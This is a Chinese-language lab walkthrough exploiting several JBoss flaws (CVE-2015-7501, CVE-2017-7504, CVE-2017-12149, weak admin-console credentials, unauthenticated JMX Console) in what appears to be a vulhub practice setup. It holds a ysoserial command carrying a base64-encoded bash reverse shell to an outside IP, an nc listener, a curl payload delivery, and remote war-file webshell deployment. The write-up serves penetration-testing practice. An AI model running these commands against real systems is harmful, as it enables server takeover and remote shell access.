一、CVE-2015-7501
1、开环境


2、访问地址

出现了让下载的页面,说明有漏洞
3、下载ysoserial工具进行漏洞利用

4、在cmd运行

看到可以成功运行,接下来去base64编码我们反弹shell的命令

5、执行命令
java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNTAuMTU4LjE5OS4xNjQvNjY2NiAwPiYx}|{base64,-d} | {bash,-i} ">exp.ser

6、监听端口
nc -lvvp 6666

7、执行命令
curl http://150.158.199.164:8080/invoker/JMXInvokerServlet --data-binary @exp.ser

8、得到shell

二、CVE-2017-7504
1、开环境

2、访问目录
/jbossmq-httpil/HTTPServerILServlet

3、在kali运行python程序
python jexboss.py -u 指定网站
拿到shell

三、CVE-2017-12149
1、开环境

2、访问目录
/invoker/readonly

返回500说明此页面存在反序列化漏洞
3、使用工具检测
输入网址,检测,存在漏洞,系统是Linux

4、执行命令
whoami

四、Administration Console弱口令
1、开环境
环境还是上一个的环境
2、登录后台
/admin-console/login.seam

使用弱口令admin/vulhub登录

3、点击web应用

4、上war包,注入这个包的名字不可以太短

5、访问文件

6、测试连接

五、低版本JMX Console未授权
1、开环境

访问/jmx-console/
密码是admin admin


2、进入目录


3、在我们服务器的网站上传一个war包

4、远程部署war包
http://150.158.199.164:8080/wjf111.war


5、访问文件
/wjf111/1.jsp

6、测试连接

六、高版本JMX Console未授权
1、开环境

访问/jmx-console
2、找到文件部署的位置
Jboss.system——service=MainDeployer
——deploy——java.net.URL


3、把我们服务器里的war包改下名字

4、远程部署war包
http://150.158.199.164/wjf222.war

5、访问文件

6、测试连接
